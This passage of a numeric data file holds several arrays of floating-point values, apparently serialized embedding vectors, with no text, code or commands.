,0.03209545,0.016829945,-0.03448603,-0.0013055583,0.051355056,0.0038334143,0.011734853,-0.00037703462,0.03966471,0.015187993,0.026595451,0.016723264,-0.0274599,-0.007482314,0.01832128,-0.037355468,-0.038507085,0.03376791,0.032514933,-0.021819072,0.016891528,0.004863282,-0.02839881,0.054768283,0.036987938,0.02944588,0.031245733,0.060931884,-0.037328333,0.051083148,0.0006953907,0.0064204936,0.0012884621,-0.0036230127,0.011513518,0.04250279,-0.0062286984,0.01514383,0.029283844,0.004425372,-0.0206046,-0.013931707,0.0442382,-0.02191529,0.013973644,-0.07957122,0.03465224,-0.025454592,-0.02841895,0.0075204833,-0.003428922,0.0036162585,0.0066628777,0.03480119,-0.0017636295,0.01917769,-0.082272045,0.047249023,-0.02702409,-0.009923787,0.0049836044,-0.05512341,0.020330846,0.01500639,-0.06588514,0.02232051,-0.016493531,0.011991347,0.060842164,-0.028217196,-0.05201527,-0.011841314,0.009498708,-0.027973436,0.04011063,-0.058475647,-0.040274188,0.044138476,-0.016613586,0.000644532,0.03509822,-0.0392907,-0.06894872,-0.005483273,0.014238385,0.04642605,0.031065788,-0.017806426,-0.03522335,0.036815993,0.032401886,0.013359864,-0.003535733,0.0008336714,0.01926662,0.028830301,0.074203946,0.001989894,-0.01286507,0.044811398,0.005843136,0.01992708,0.016669312,0.011746219,0.0029229582,0.003086724,0.044125658,0.003028526,0.0124857295,0.036498815,-0.07163551,-0.04955996,-0.027368616,0.010820175,0.05477394,0.05554838,0.0033908824,-0.06534658,0.086783685,0.008424697,-0.013702536,0.016907249,0.02260596,0.07687969,0.00422346,0.028826568,-0.017810533,0.022061506,0.044939127,0.0074386057,0.0013980744,-0.037462022,0.014902634,0.0064000846,-0.019510476,0.009637115,-0.06937606,0.031926345,0.09215794,-0.04691291,0.00717202,0.018379442,-0.0477882,-0.003020762,0.023445422,-0.09107752,-0.006957416,-0.034895517,0.018749112,0.013237621,-0.05442615,-0.023555176,-0.04563946,-0.00447026,0.041615073,0.016894756,-0.012290836,-0.009902422,0.011061558,0.03181106,0.03374902,-0.006350173,-0.024404025,-0.032464575,-0.083771884,-0.029274283,0.0061317105,0.0852653,0.0040736273,0.009253515,0.040825155,-0.0019515248,0.007740906,0.033053942,-0.01592977,0.056341927,-0.07795725,-0.05173433,0.01095638,-0.026529903,0.0055684107,0.025248239,0.026124118,0.024223993,-0.05635927,0.0001395338,0.053015273,-0.054220784,0.052402664,0.036697414,-0.042914405,-0.028543398,0.01363608,-0.054771177,-0.0010904593,0.04096562,-0.087801546,0.04524158,0.011494225,0.036111914,0.017905975,-0.07905863,0.011777889,0.039774615,0.0017753057,-0.0020602192,0.016465204,0.054552257,0.06504955,0.016616262,0.015917484,0.010369159,-0.04707163,0.0082489895,-0.008353119,-0.06266481,0.039509445,0.032292742,-0.08655248,0.010191277,-0.05462491,0.017078262,-0.02618587,-0.009487385,-0.04050567,0.002666316,-0.00023719788,-0.02573394,-0.062009417,-0.009125391,-0.023653178,0.054636285,0.006358953,-0.012938197,-0.04456816,-0.007822765,-0.026723776,-0.01965718,0.0010153461,0.015503172,-0.055662554,-0.013027123,-0.016259357,-0.03383836,-0.027331475,-0.013368404,0.018073125,-0.027641963,-0.049572423,0.070961,-0.030051688,0.0212162,0.02039781,-0.017086213,-0.022995582,-0.055654928,-0.038329672,0.008837672,-0.022112487,-0.025444016,0.002365286,-0.008365732,-0.014369221,0.006920891,0.02468405,-0.008468819,-0.023189044,-0.032839254,-0.06802022,0.03535088,0.012565024,0.03892922,-0.07564316,0.030116737,0.052494194,-0.0060651912,0.034058314,0.019608336,0.012854493,-0.029763514,0.042772826,-0.064848654,0.028422184,0.0059427447,-0.04029829,0.069338016,-0.07115898,-0.05085682,-0.050961502,-0.026358526,-0.069361776,0.050996967,-0.034794297,0.05015515,-0.02327982,-0.004193698,-0.039929602,-0.0068261875,0.028824646,-0.107909285,-0.0003132441,-0.011440399,-0.023436734,-0.07602382,-0.0069200345,-0.0364187,0.04032442,0.001651171,0.070647955,0.010980021,-0.00776075,-0.031658743,0.03922958,0.05090932,-0.005511188,0.0046399473,0.06171959,-0.010990034,-0.052362576,0.06720155,0.07466972,0.03540807,-0.008224469,0.0058900053,-0.03242895,0.05649057,-0.015394466,-0.0020813043,-0.017124997,-0.0292071,-0.037534334,-0.021497732,0.045478497,0.00319076,-0.024868846,-0.03168011,-0.01213214,0.009503126,-0.045100205,0.0584132,0.03226861,0.010325135,-0.038056962,0.0074665714,0.006785164,0.025051983,-0.0003240272,-0.01531784,-0.038528685,-0.028534876,0.009398125,0.05604772,-0.0649906,0.012713274,-0.04774416,-0.00050169,-0.046396013,-0.011868447,-0.0034941551,-0.020011555,-0.024427118,0.009312081,-0.012287435,0.026866728,0.024005426,-0.013833632,-0.030692834,-0.038012102,0.0497951,-0.008716923,0.048597697,-0.00951014,-0.002005616,0.040383194,0.012777741,0.067373104,-0.015671818,-0.0032384854,-0.049725067,-0.056116663,-0.0075965975,-0.040346015,0.026477002,0.078775905,0.03795822,-0.023384726,-0.008817595,-0.024242716,0.024173144,0.029157203,0.00046993475,-0.044308644,-0.012104943,0.03896516,0.0005982779,0.061621506,-0.054860927,0.019169763,-0.010701487,-0.023979157,0.0106648775,-0.030249692,0.07466757,0.0019981577,-0.0065471977,0.018658131,-0.017384104,-0.06884101,-0.020145368,-0.012644274,0.03143945,0.009005429,0.0037599471,-0.0023782274,-0.00038075395,-0.035419352,0.0455104,-0.018250423,-0.08073502,0.03452712,0.0063566756,-0.011471902,0.022206703,-0.013957566,0.042835157,0.025947027,0.0030885264,0.08993699,0.009183332,0.023788195,-0.034929596,0.038985506,-0.016474174,-0.0537047,-0.04725268,-0.0152714085,-0.00003804881],[0.00835922,0.11862378,-0.19012599,-0.071941786,0.077701725,0.029294724,0.02000394,0.032142963,-0.011335597,-0.021520656,0.008484286,0.043508526,0.09755525,-0.059765507,0.026507055,-0.0025535235,-0.028357534,-0.056267194,-0.014477561,0.042638328,0.012785355,-0.012864133,-0.052839387,-0.021564597,0.06393672,0.02428909,0.050440095,-0.008359272,-0.022637691,-0.0036147528,0.03597691,-0.036154844,0.0040929606,0.04316039,-0.054158457,-0.010081529,0.0042539053,0.030185897,0.029804854,0.02943525,0.0717849,0.012950231,0.0021846266,-0.034435034,0.0062538367,0.00024299009,-0.012439798,0.022142012,0.07616278,-0.0954792,0.021317283,0.0033005718,0.010311355,0.06933322,0.057823405,0.05169116,-0.0020372595,0.021062838,-0.021635367,-0.03865339,0.07946368,0.046416633,-0.03666403,0.0241876,0.06716238,-0.03798454,0.012054581,0.017038839,0.037545074,-0.034410022,0.050702907,0.01755317,-0.004600983,0.0020448128,-0.032615643,-0.018201914,-0.011871624,-0.0016768366,-0.009294741,0.021143196,0.05881271,-0.006438118,0.067395456,0.0024938006,0.063300155,-0.02382691,-0.028598148,-0.0057255966,-0.009891595,0.093785785,0.020872185,-0.020252798,0.033718072,-0.028101625,-0.05158682,-0.011383897,0.0069017746,0.051676806,-0.06607778,0.05101091,-0.059509154,-0.023627415,0.022189094,0.014967743,0.01927586,0.065138295,0.0055494835,0.035933618,-0.046106312,-0.00011326686,-0.03870452,0.024031974,-0.020089732,-0.0008763807,0.0049898336,-0.019664824,0.06733396,-0.04198496,-0.016724695,0.04139236,0.0003134508,-0.005458253,-0.022964114,0.050240915,-0.0041411486,-0.018859016,-0.052702304,0.01393712,-0.036937863,-0.03581503,-0.043717764,0.0038639044,-0.060138714,-0.006330975,0.024663934,0.04787645,-0.03447131,-0.01729052,-0.0070147477,0.028147954,0.018214762,0.014553095,-0.04192585,-0.01994308,0.015046738,-0.035124548,0.030101452,-0.041868065,-0.050889213,-0.0092731295,0.036643807,0.033192184,-0.03112659,0.017004434,-0.00775202,-0.035993494,0.046109598,0.0024712991,-0.0031719743,0.0023804938,0.022954104,0.01953447,-0.05587267,0.037621763,-0.021929445,-0.03520474,0.018579625,0.022780735,0.0029440592,0.031269312,-0.081628785,-0.015101764,-0.013698673,-0.000007887236,0.026579915,-0.032157354,0.0469154,-0.0024364349,0.030342601,-0.0063562677,0.012302004,-0.05534662,0.04821132,-0.006489172,-0.020531759,-0.024409726,-0.008493795,-0.010365951,0.026798623,-0.035119686,0.027473366,-0.0042578112,-0.054802258,-0.003869778,-0.034168262,-0.045226425,0.032241415,0.010273396,0.013778277,-0.044776898,-0.040116828,-0.0011453136,-0.038681865,0.009195159,-0.0004594607,0.051719546,0.0013462856,0.06918856,-0.00022092354,0.032354116,0.06303604,-0.026159797,0.0041661635,0.043354955,0.004932952,-0.03352629,0.0012041456,-0.030136844,-0.0051756976,-0.01043812,0.017603833,0.0064961645,0.011914715,-0.0338464,0.018889181,-0.026648372,-0.075269386,-0.029517734,-0.0024269205,0.0007980821,-0.007721692,-0.09593004,0.04567148,0.009137543,-0.008230629,0.057100356,-0.029120691,0.066466995,-0.013157144,0.00032990816,0.008979594,0.035035446,-0.042283762,0.0035311074,-0.028257541,0.00073314144,-0.018800935,-0.034737527,-0.019156193,0.029335607,0.007304205,0.0013243883,0.04779826,-0.005209568,0.039737605,-0.02820307,-0.034174196,0.007107344,-0.011284005,0.02841902,0.04892418,-0.018737726,0.033326514,-0.049691394,0.004524883,-0.018283257,-0.035728093,0.022727557,0.012180966,0.005383916,0.05186657,0.033768468,-0.0029335348,0.021895489,0.019517105,0.021828406,-0.0046126666,-0.025757605,-0.05623542,-0.0013279978,-0.048429064,-0.007716194,-0.034193438,0.011414228,0.017036753,0.015641857,-0.030765811,-0.003797899,0.005791349,0.018211752,0.022319825,-0.021594746,-0.050824944,0.016821496,-0.01402535,0.017795168,0.020395871,0.047431972,0.021571267,-0.08833918,0.047379047,0.028213961,0.07257198,0.0347945,0.00048475308,-0.022863174,0.032527298,0.003419292,0.0050495127,-0.016562978,-0.02284129,-0.00026578305,-0.043702383,0.0014348843,-0.0382509,0.032618202,0.016568458,0.021765068,0.062864415,-0.013389665,0.013896808,-0.05745405,-0.013521598,-0.06287268,-0.010909953,0.008953377,-0.060326505,0.03368505,0.009123229,-0.04473887,0.04047414,0.031214382,0.03493064,-0.021009352,-0.038492948,0.062120136,0.05840509,-0.007435311,0.024989322,0.08232984,0.027407834,-0.004794518,-0.020865792,-0.049295332,-0.017225327,0.018018883,-0.039506078,-0.015829781,0.048112027,0.014962666,0.008451444,0.011474372,-0.020449584,-0.010295207,0.009517516,0.024155088,-0.007216198,0.0343841,0.027680412,-0.022846516,0.05556257,0.016574506,0.016170051,-0.0032871799,-0.0043086386,0.008219442,0.02930396,-0.0060644983,-0.023883019,0.02154735,-0.007988643,-0.05780847,0.01104399,0.036289506,0.011216976,-0.021319011,-0.13496609,0.021386767,-0.020763738,0.05524606,0.04806506,0.0013502642,-0.00021942175,-0.00888555,0.048435193,-0.015080009,0.018005671,-0.07010481,0.0010757115,-0.005460592,0.0154511705,-0.0027605498,-0.048252393,0.017008774,0.033399228,-0.05475875,-0.049237512,0.011126883,0.009601207,0.025155904,-0.030712442,-0.04603351,-0.0032686037,-0.010580627,-0.027361533,0.051807724,-0.029870361,-0.011658495,0.08471665,0.012515257,-0.005925251,0.036529023,-0.035511725,-0.067030534,0.017751737,0.035350803,0.064186074,-0.02432569,-0.0075408374,-0.04672432,0.06823728,0.0012379615,0.053595446,-0.019611398,-0.0037286351,0.041686505,0.05875666,0.04735855,-0.013398667,-0.06101847,0.06249861,0.036493413,0.04548084,0.020914173,-0.015068253,-0.00021970869,0.03648142,0.035450455,-0.049305383,0.0086499695,0.059810776,-0.08138563,-0.046385974,-0.041239843,-0.01130597,0.05273709,0.03072841,-0.047344424,-0.06609837,0.027421575,0.052758694,-0.040103838,0.01449374,0.03679597,0.112159595,-0.0045196502,-0.017954793,0.0151485605,0.050405342,0.02450684,-0.02966632,-0.018143758,-0.07070256,0.029523194,0.060659144,-0.06853793,-0.016858058,-0.053413805,0.030624678,0.022898536,-0.032731123,0.031695347,-0.02377176,-0.031943463,-0.0406024,0.006146571,-0.042894974,0.0024434826,0.023332302,0.052075204,0.026056182,-0.011013521,-0.011802359,-0.03641448,0.0044988976,0.018198159,0.017853564,-0.018033694,-0.0060571367,-0.019866781,0.02538301,0.00071399735,0.073061004,0.00005625971,-0.012628471,-0.0102304,-0.005159923,0.0040961937,-0.01640584,-0.02418717,0.04943811,0.07183649,-0.02777953,0.008895791,0.031719342,-0.020731265,0.03444971,-0.012031539,-0.04543096,-0.039179005,-0.000029335073,-0.018987287,0.012941441,0.00847631,0.028626695,-0.019639842,0.014452368,-0.006097642,-0.02421623,0.023961712,-0.010828554,-0.019627001,0.013841735,-0.013903938,-0.06085552,-0.024880178,0.02648701,-0.015008316,0.04011331,0.01982098,0.03701226,0.045219894,-0.03754349,-0.056659717,-0.034407813,0.0075637572,-0.03117894,0.018506661,0.060636744,0.058490273,-0.004037746,0.028963298,0.038665198,-0.016850103,0.03231401,-0.04583789,-0.021858286,0.01376453,0.009496824,-0.08813524,0.027571464,-0.05489499,0.0027328928,-0.015322166,-0.00025748828,-0.06823453,-0.0007817857,0.0041942396,-0.05725652,-0.02662896,0.027971258,0.09085781,0.06423771,0.034385197,0.0031605617,-0.033903584,0.0026169897,-0.01438302,0.0077492963,-0.004634434,-0.00691824,0.00009902179,0.03683075,-0.012145762,0.0015207329,0.02528344,-0.013033871,0.017148605,-0.061960127,-0.09200049,0.010513071,-0.05092519,0.04930919,0.0419339,-0.038121946,-0.004819849,-0.057983913,-0.045737173,-0.01708566,-0.03211869,-0.008944445,0.0026495787,0.0028849295,-0.037411466,0.005125019,0.0061215004,-0.01811747,-0.050600424,-0.07711131,-0.08365189,-0.026329948,-0.0056545567,0.044924103,-0.02751803,0.0059929695,0.013837311,0.000135952,-0.016714692,0.006093143,-0.010955633,0.03142028,0.019679515,-0.057254948,-0.026186444,0.020192156,-0.038500253,0.06387978,-0.0013744036,-0.026796142,0.019762764,-0.04259943,-0.043377172,0.030344509,-0.051857237,0.02847362,-0.029644493,-0.058269795,-0.02819236,0.0036622344,0.05066345,-0.040626258,0.017729616,-0.028827136,0.00052000524,-0.087435834,-0.014108735,-0.031111602,0.023008237,0.00037911852,0.013830228,0.037315544,-0.011104385,0.011489603,0.028498156,0.050562773,0.03123946,0.015282886,0.05799195,0.045098905,-0.03538012,0.04067336,0.033648707,0.0029821745,-0.035675477,-0.025087057,0.014605717,0.021279063,-0.029314298,-0.057585668,-0.052191,-0.016462965,-0.001654779,-0.017979305,-0.015659478,0.0089150695,-0.013310212,-0.000043299922,-0.01734751,-0.024624793,-0.04821786,0.034055732,0.046246964,0.011401579,-0.025993135,0.030681076,0.008336585,0.04211467,0.025575176,-0.024281533,-0.011117362,-0.0067576333,0.028747259,0.033809576,-0.05280279,-0.025712753,-0.005617133,-0.017119266,-0.019646434,-0.009342709,-0.021295335,-0.013110535,-0.059615612,-0.006541903,-0.032095153,0.0061315484,0.019304028,-0.027356217,0.007317295,-0.02758697,0.052118335,-0.0035353056,0.002751852,0.003744633,0.03286177,0.009192386,-0.023269057,0.07739004,0.013202908,0.0030585006,-0.059935354,-0.009908802,0.0060703317,-0.030882275,0.023603395,0.049954146,0.0056862514,-0.0117007205,-0.00018939037,0.013717743,-0.012316941,0.048762977,-0.030885506,-0.0422928,-0.038098805,-0.0086942995,-0.010330577,0.012334836,-0.053134795,0.016751261,0.010083913,-0.00019889724,0.0008715314,0.0043666204,0.03783569,-0.010704807,0.03759513,-0.008652668,-0.032343604,-0.03532258,0.007412824,-0.038752336,0.023766179,-0.025871076,0.0020185579,-0.028036607,-0.036431663,-0.055431902,0.07923217,0.022027079,-0.04032812,0.038422745,-0.025237788,-0.0012423857,0.040393054,0.042393703,-0.011838031,0.05222845,0.014127962,0.110946745,0.059520077,0.016279327,-0.009051792,0.03682314,0.039540052,-0.05832521,-0.061189987,-0.034007452,0.019361643],[-0.007720998,0.03753362,-0.19427012,-0.061293248,0.044059537,-0.0005561772,0.021920906,0.04530394,-0.04788554,-0.03789094,0.0041178423,0.035572603,0.07770531,0.024717128,0.017693622,-0.039025504,-0.012741467,-0.056938443,-0.025392532,0.072822906,-0.0053886687,-0.0052627185,0.019774277,-0.034909196,0.078307405,0.03164844,-0.00072958006,-0.011201817,-0.03260557,0.0058881165,0.019469002,0.00842463,-0.005277961,0.029089823,-0.08765977,-0.030907305,-0.0031968001,0.028907508,0.020125587,-0.008113542,0.06870226,0.0441599,-0.027638301,-0.002057456,0.026016941,-0.00482425,0.02829498,-0.010149936,0.0519468,-0.078957774,-0.0051353774,-0.0122145945,0.0041206605,0.012078894,0.098805375,0.049401,0.014557261,0.031300113,0.007522115,-0.039843883,0.06684022,0.0409307,-0.108550824,0.04416557,-0.012570898,-0.03658365,-0.054932065,0.0399274,-0.0031470929,-0.032313064,0.039657038,0.011279985,-0.009469514,0.045465607,-0.065866925,-0.056428928,-0.009598662,-0.01683712,0.019048285,0.0029440057,0.007690912,0.0058633015,0.08774978,0.012506402,0.06350389,-0.0077186585,-0.011465514,0.016558163,-0.03684689,0.067827165,0.0124644255,-0.036225893,0.020305496,-0.040727843,-0.084257364,0.011081918,-0.004211937,0.050012954,-0.012452985,0.0050676237,-0.032801166,-0.024141861,0.010672049,0.017895589,0.0068137515,0.037971817,0.02082246,-0.00020650879,-0.04863206,-0.024819288,-0.006964369,0.0932433,0.00020944327,-0.016213039,-0.027551556,-0.010678465,0.03174334,-0.051909257,-0.016730467,0.009068015,-0.014148292,-0.027813168,-0.021406723,0.062100768,-0.023399835,0.005534125,-0.046736095,0.05960855,-0.037559044,-0.030973032,-0.016207699,-0.009196107,-0.05291195,-0.014987465,0.019224105,0.051549543,-0.024694689,-0.018695863,0.012870489,0.02022821,0.0474099,0.033308737,-0.021837477,-0.076208204,0.017855294,-0.03534859,0.028142396,-0.059880856,-0.040159382,0.014112322,0.08727809,0.0033503126,-0.0002908619,0.009484546,-0.0034690732,0.0076581324,0.0066194967,0.01746845,0.008554873,0.014014342,0.051638465,-0.020219635,-0.050779425,0.041249696,0.008292989,-0.06264001,-0.04678121,0.04054637,-0.044417843,0.021395134,-0.05248731,-0.009509928,0.003619461,-0.022192836,0.004292417,-0.0039225956,0.04774145,-0.035663433,0.039134506,-0.021583311,0.0316059,-0.06581359,0.04406587,-0.016471835,-0.034631297,-0.010563505,-0.016079698,-0.035848286,0.0056294585,-0.04902245,0.013334593,-0.006125465,-0.029198246,-0.0065010944,-0.023887647,-0.05234589,-0.002395466,-0.0014985257,0.029806592,-0.014861979,-0.07500467,-0.018650204,-0.04892785,-0.024235815,-0.05167976,0.08337119,0.008043631,0.005890575,-0.07504074,0.03475788,0.08773599,0.00963528,0.032468546,0.028389186,0.029583752,-0.01803512,-0.004371358,-0.02896142,-0.030551957,-0.005478021,-0.017561415,-0.009130023,0.016738359,0.02214922,0.030007455,-0.013677916,-0.0066744257,-0.021956874,0.0064944844,0.00933131,-0.00793336,-0.07374658,0.024272937,-0.0015628105,0.0063560614,0.043742515,-0.0044963355,0.06007946,0.019410191,0.00021567284,-0.018929848,0.02684022,-0.035861924,0.008524794,-0.02093117,0.0029752597,0.024302857,-0.020974172,0.010691599,0.043209385,-0.0005125839,0.0011600676,0.004475803,0.015286458,0.04585481,-0.028679973,-0.028714513,-0.009368935,0.0124323,0.020884505,0.047878157,-0.039236024,-0.012649593,-0.048529107,-0.031484336,-0.03393151,-0.008116164,0.015192242,0.0072424337,0.0070730234,0.025253633,0.032617483,0.027103245,0.02749999,-0.008711407,0.02616557,-0.036654603,-0.046479624,-0.00059885543,-0.0106815,-0.000119827884,-0.022533013,-0.027293045,0.026444009,-0.0027999158,0.021270841,-0.007909124,0.0013890326,-0.014707918,-0.006588778,-0.0009007389,-0.024230829,-0.03916123,0.01042168,-0.004130902,0.028534545,0.02834532,0.0352526,0.033791922,-0.07010528,0.042076375,0.038342535,0.03642874,0.05929594,0.017189879,0.0068914904,0.045440346,-0.0154148815,0.05120365,-0.06591945,-0.024016812,0.028541096,-0.034160383,0.03811688,-0.046134826,0.007064313,0.015426414,0.011292721,0.0138442805,0.00019392929,0.012774183,-0.055413093,0.038404927,-0.022511654,-0.050735656,0.08754033,-0.026738092,0.023190627,-0.030648367,-0.03141302,0.0351356,0.016428083,0.0019517309,-0.044447348,0.0027587418,0.0346456,0.023224406,-0.008730021,-0.01858808,0.04142065,0.024854522,0.027037824,0.030668033,-0.023571076,0.012796655,-0.007506246,-0.048633873,-0.026011005,0.023156827,0.042074326,-0.028180696,0.015616409,-0.022400526,-0.04551555,0.0026159117,0.0007073969,0.020461682,0.030198699,0.032808304,-0.0009114162,0.062239565,0.003230137,0.006886509,0.020911949,-0.025630055,0.030338041,0.0045368196,0.010234307,0.020304589,-0.016316224,-0.012314364,-0.0037842176,0.0003929982,0.003355697,-0.04554584,0.0025645844,-0.09427359,0.046132766,-0.011397093,0.009988475,0.02406046,-0.002349583,0.018110264,0.019908212,0.04122666,-0.048749194,0.020537078,-0.024452839,0.030401288,0.0051264493,-0.030369988,0.004337392,-0.031173972,0.028661957,0.024711339,-0.024937702,0.033849053,0.045491662,-0.0014336709,0.048136372,-0.025791038,-0.047574647,-0.0028818846,-0.015654609,-0.010962606,0.007475091,-0.024993476,-0.078261636,0.017841566,0.0177332,0.011915942,0.05417873,0.002778853,-0.040795058,-0.010409297,0.044684406,0.04050853,0.003520999,-0.014260869,-0.059484076,0.039610542,0.058945145,0.03436785,0.02412278,0.04269062,0.04107966,0.027633602,0.06595774,-0.025597854,-0.058937743,0.073823355,0.025333345,0.022749446,0.027914736,-0.030120634,0.00082205207,0.021964261,0.024474185,-0.045234494,0.036772825,0.045255303,-0.045327943,-0.050091002,-0.03145793,0.05523692,0.020293897,0.057482738,-0.037598647,-0.098339565,0.06371567,0.028144497,0.018006962,0.020080006,0.027613325,0.13557617,0.018829387,0.011563144,-0.0023828822,-0.01664066,0.036376555,0.021040648,-0.0022292342,-0.022059808,0.030609163,0.013513631,-0.030650808,-0.041070793,-0.049888823,0.009071443,0.030272862,-0.056184307,0.032370288,-0.0019681342,-0.054576308,0.008902016,0.043886043,-0.05032848,0.012959208,-0.01167881,0.059318535,0.017665125,-0.054171592,-0.01902573,-0.021795096,-0.008624563,0.030629411,0.012194645,-0.024646591,-0.005181044,-0.025684698,0.047688805,-0.015208816,0.029820915,-0.010212942,-0.009530624,-0.022986455,-0.030223574,0.048413668,0.016367787,-0.0048998324,-0.0040084203,0.080725774,0.0017177002,0.004904648,0.03138795,0.011178921,0.07172028,-0.057393666,-0.06115122,0.006675368,-0.0018256189,-0.0111921,0.012201263,0.033400383,0.0723783,-0.040538188,0.034209907,0.008055486,-0.040099233,0.015323235,-0.002760173,-0.045209374,-0.016005618,-0.010693495,-0.06916354,-0.015628904,0.0038488412,-0.07945159,0.0133667,0.0045694583,0.027896877,0.009373483,-0.053880423,-0.014924754,0.012092557,0.0068513555,-0.049867835,-0.005716357,0.021174693,0.041189834,-0.007216096,0.046635035,-0.016375698,-0.019087194,0.007666465,-0.005069546,-0.03534595,0.01925221,0.019328548,-0.07972375,-0.020513585,-0.041798778,0.023570588,-0.05421873,-0.0032330223,-0.059633728,-0.02643684,-0.003217141,-0.049603056,-0.0674725,-0.040277038,0.04250491,0.054996025,0.008521175,0.03037297,-0.03477192,-0.004818963,-0.01704568,-0.007455147,-0.004020041,0.017556176,-0.040270776,0.018463964,0.00007315046,-0.038117908,-0.01827246,0.022614788,0.024631582,-0.033631157,-0.044032138,0.029897898,-0.04606689,0.030305766,0.0388409,-0.050011706,-0.019612517,-0.06554129,-0.01817193,-0.023130154,-0.00636646,-0.019290036,0.014063973,0.026837096,-0.022834437,-0.008612249,0.020504355,-0.044361003,0.0037714466,-0.012404852,-0.08405086,0.0137512265,0.040513527,0.049925342,-0.058939744,0.03801902,0.081612535,-0.0027357603,0.065489806,-0.019965537,-0.009089202,0.026270583,0.06452606,-0.020812623,-0.010303855,-0.017625393,-0.07660385,0.04573718,-0.022200292,-0.038881235,-0.017377498,-0.017244872,-0.08091709,0.07762955,-0.043968458,0.0601181,-0.02116098,-0.04027503,-0.008711159,-0.018907648,-0.019031286,-0.05390528,0.009935334,-0.07027019,0.018309956,-0.08918461,0.012990481,-0.00442247,0.047886293,0.029530974,0.039882474,0.01867148,-0.0027742889,0.02631345,0.019200722,0.08017084,-0.00683848,-0.010701902,0.051451787,0.04931246,-0.05343634,0.057738338,0.05233094,0.038813412,0.0007392859,0.0048354995,-0.007892225,0.022020113,-0.010258794,-0.046475604,-0.030876651,-0.024137616,-0.0138056185,0.011831208,0.01214664,0.029491192,0.0024606937,0.006693358,-0.036042597,-0.015373508,-0.020935776,0.047791146,-0.00506025,0.030326482,-0.051256977,0.019677732,0.011573161,0.033303726,0.052174877,-0.013017046,-0.035135716,0.031566236,0.008187329,0.029868033,-0.037374247,0.007491021,-0.05063745,0.031591393,-0.03318872,-0.008716091,-0.011676505,-0.026504677,-0.038472347,-0.0308671,-0.01155804,-0.008254313,0.014857756,0.03040988,0.023043323,-0.0136363385,0.048892614,0.01121995,-0.0031085312,-0.00068116304,0.021240506,0.018077008,-0.013607201,0.04464603,-0.012578021,-0.0031606317,-0.06128412,-0.039818507,0.027813502,0.01040496,0.06786314,0.026918793,0.025642227,-0.002165003,-0.057273213,0.0068446165,0.022204736,0.015998434,-0.032747317,-0.030044695,0.003521325,0.0055517466,-0.012351162,0.009871589,-0.020299891,0.027402775,0.0040662624,-0.018033585,-0.0039745932,-0.026812496,0.07461904,-0.010767762,0.027569465,0.008161857,-0.036217466,-0.06432194,-0.0033711502,-0.023055622,0.06285948,0.008818582,0.0012083274,-0.031297263,-0.05656904,-0.0048909765,0.10524426,-0.011189118,-0.06546959,0.016742589,0.016907085,-0.008980616,0.015126925,-0.06291283,0.009392856,0.0126789035,0.070071906,0.08484521,0.0364673,-0.0047378466,0.015398381,0.057466455,-0.0049602273,-0.05441284,-0.004262082,0.006070866,-0.03069952],[0.00053967,0.050950415,-0.14776526,-0.07355549,0.04182749,-0.056380685,0.021371799,0.012523853,-0.020346455,-0.04822123,0.008702501,0.00006720163,0.0953722,0.00046826946,0.029808326,-0.058007836,-0.030828046,-0.049229015,-0.0043637548,0.06778997,-0.028959103,0.013467039,0.018050289,-0.033878457,0.05932145,0.063292526,0.007609558,-0.022505708,-0.026779154,0.012651927,0.070779085,-0.012692398,0.0021635196,0.031265706,-0.06298203,-0.054101977,0.017097129,0.03597785,-0.037308525,0.049948253,0.056882985,0.043048006,-0.0366505,-0.006896236,-0.022963988,-0.049619578,0.05757817,-0.017994573,0.017953064,-0.05307137,-0.007429596,-0.012108306,0.03770957,0.0057794335,0.11206028,0.029328516,-0.0005455011,0.01599777,0.01460241,0.0022424571,0.10718357,0.05615379,-0.07429307,0.046706185,0.021620102,-0.0312843,-0.03304754,0.030500626,-0.006964919,-0.015364198,0.031294838,0.019693997,-0.018878646,0.02411705,-0.051923603,-0.028476402,-0.007025244,-0.02386389,0.02573283,0.037137847,0.042275656,-0.00848176,0.08395725,-0.020455573,-0.01705166,-0.049166795,0.015404085,-0.005709936,-0.029409729,0.040581662,0.0017934089,-0.037784107,-0.008776799,-0.0043323752,-0.08494672,0.0062701553,-0.004792032,0.04189957,0.0068784603,-0.009257624,-0.06867498,0.006867116,0.02402078,0.020789891,0.011352849,0.060740415,-0.020054338,-0.00734972,0.016772203,-0.0068910276,-0.060382448,0.11562544,-0.018872282,0.008928833,-0.022593556,-0.04255728,0.025301607,-0.037923034,-0.01744869,0.011138379,-0.0050967573,-0.03424476,0.006970217,0.07218521,-0.05166774,-0.0023252661,-0.020218985,0.048148442,0.018008588,-0.05257905,0.010947052,-0.011123515,0.002690533,-0.004056274,0.008192721,0.052646242,-0.06830753,-0.027440589,0.016638227,0.00085165544,0.0054661003,0.041500736,-0.052684106,-0.04039408,0.01893973,-0.04641292,0.023184761,-0.049966924,-0.038508225,0.009001181,0.018396746,0.01322178,-0.018960966,0.015702022,0.00997272,-0.013444352,0.033579893,-0.027324812,-0.00606326,0.023779836,0.034189124,0.03978692,-0.046148594,0.049231242,0.0006323445,-0.04756224,0.011445619,0.010101568,-0.040840883,-0.00089654874,-0.06503817,-0.0020635498,-0.0016685461,0.0029043835,0.03355445,0.008492584,0.07651097,-0.032247115,0.0378335,-0.024356354,0.022935292,-0.029624674,0.01817111,0.0243402,-0.024596512,-0.007921308,0.018011132,-0.026341984,0.008614573,-0.01526835,-0.006561417,-0.014909386,-0.033964586,-0.017205482,-0.040127996,-0.029862033,-0.010808309,0.0063514467,0.017137066,-0.03840854,-0.07898438,-0.04799006,-0.054071806,-0.018271273,-0.015702289,0.04112405,0.0006041681,0.037971623,-0.076770425,0.05706525,0.04770977,-0.020915847,0.01681145,0.029156867,-0.007139311,-0.015756797,0.00042790608,-0.026870724,-0.01709121,0.023424758,-0.0082746055,-0.017680336,0.011263387,-0.0066160574,0.025851801,-0.010265213,-0.0149035435,-0.003101636,0.00047213037,-0.030325064,-0.017304825,-0.038293477,0.055294346,0.03065949,0.0109633105,0.012229049,0.014707535,0.05503551,-0.007514518,0.008718273,0.0064334082,0.03866949,0.014691037,-0.016907271,-0.004883362,-0.008332471,0.03637471,-0.045959704,-0.013451523,0.08317528,-0.010143964,-0.008419254,0.038049094,-0.017534161,0.053744305,-0.012916593,-0.04977358,0.0067974892,-0.004327252,0.016917905,0.05579872,-0.014378145,-0.029116208,-0.04118058,-0.041489813,-0.058123913,0.006932534,0.0208561,0.011584675,-0.012735504,0.013929566,0.063930504,-0.002844667,-0.011449399,-0.014261433,0.024045153,-0.04788451,-0.031447038,-0.0027390027,-0.010561327,0.005675958,-0.006176725,-0.020810083,-0.00656297,-0.00638908,0.01961887,-0.0104742125,0.02345092,-0.019322276,0.024474962,-0.0040244395